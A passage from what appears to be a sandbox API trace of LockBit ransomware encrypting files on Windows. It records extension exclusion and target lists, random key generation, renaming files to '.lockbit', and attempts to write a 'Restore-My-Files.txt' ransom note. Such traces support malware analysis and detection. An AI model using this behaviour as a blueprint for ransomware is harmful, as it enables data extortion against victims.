(lpString1=".mwb", lpString2=".MID") returned 1 [0165.544] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.544] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.545] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.545] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.lockbit") returned 72 [0165.545] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.546] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.546] malloc (_Size=0x40068) returned 0x3df0008 [0165.546] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5393) returned 1 [0165.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.547] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.552] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.552] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.552] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.553] free (_Block=0x1fa2ed8) [0165.553] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.553] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.554] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb480d800, ftCreationTime.dwHighDateTime=0x1bd4b33, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb480d800, ftLastWriteTime.dwHighDateTime=0x1bd4b33, nFileSizeHigh=0x0, nFileSizeLow=0x6140, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00013_.WMF", cAlternateFileName="")) returned 1 [0165.554] lstrcmpiW (lpString1=".", lpString2="PE00013_.WMF") returned -1 [0165.554] lstrcmpiW (lpString1="..", lpString2="PE00013_.WMF") returned -1 [0165.554] PathFindExtensionW (pszPath="PE00013_.WMF") returned=".WMF" [0165.554] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.554] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.555] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.555] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00013_.WMF") returned 1 [0165.556] lstrcmpiW (lpString1="ntldr", lpString2="PE00013_.WMF") returned -1 [0165.556] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00013_.WMF") returned -1 [0165.556] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00013_.WMF") returned -1 [0165.556] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00013_.WMF") returned -1 [0165.556] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00013_.WMF") returned 1 [0165.556] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00013_.WMF") returned -1 [0165.556] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.556] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF") returned=".WMF" [0165.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.556] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.556] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.557] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.557] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF.lockbit") returned 72 [0165.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00013_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.558] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.558] malloc (_Size=0x40068) returned 0x3df0008 [0165.558] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24896) returned 1 [0165.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.559] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.599] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.599] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.599] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.256] free (_Block=0x1fa2ed8) [0166.256] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.256] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.256] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.256] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed5100, ftCreationTime.dwHighDateTime=0x1bd4b33, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb0ed5100, ftLastWriteTime.dwHighDateTime=0x1bd4b33, nFileSizeHigh=0x0, nFileSizeLow=0x411a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00014_.WMF", cAlternateFileName="")) returned 1 [0166.256] lstrcmpiW (lpString1=".", lpString2="PE00014_.WMF") returned -1 [0166.256] lstrcmpiW (lpString1="..", lpString2="PE00014_.WMF") returned -1 [0166.256] PathFindExtensionW (pszPath="PE00014_.WMF") returned=".WMF" [0166.256] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.256] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.256] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.257] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.257] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00014_.WMF") returned 1 [0166.258] lstrcmpiW (lpString1="ntldr", lpString2="PE00014_.WMF") returned -1 [0166.258] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00014_.WMF") returned -1 [0166.258] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00014_.WMF") returned -1 [0166.258] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00014_.WMF") returned -1 [0166.258] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00014_.WMF") returned 1 [0166.258] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00014_.WMF") returned -1 [0166.258] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.258] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF") returned=".WMF" [0166.258] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.258] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.258] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.259] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.259] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF.lockbit") returned 72 [0166.259] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00014_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.260] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.260] malloc (_Size=0x40068) returned 0x3df0008 [0166.260] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16666) returned 1 [0166.260] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.261] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.265] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.265] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.267] free (_Block=0x1fa2ed8) [0166.267] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.267] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.267] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.268] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00034_.WMF", cAlternateFileName="")) returned 1 [0166.268] lstrcmpiW (lpString1=".", lpString2="PE00034_.WMF") returned -1 [0166.268] lstrcmpiW (lpString1="..", lpString2="PE00034_.WMF") returned -1 [0166.268] PathFindExtensionW (pszPath="PE00034_.WMF") returned=".WMF" [0166.268] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned 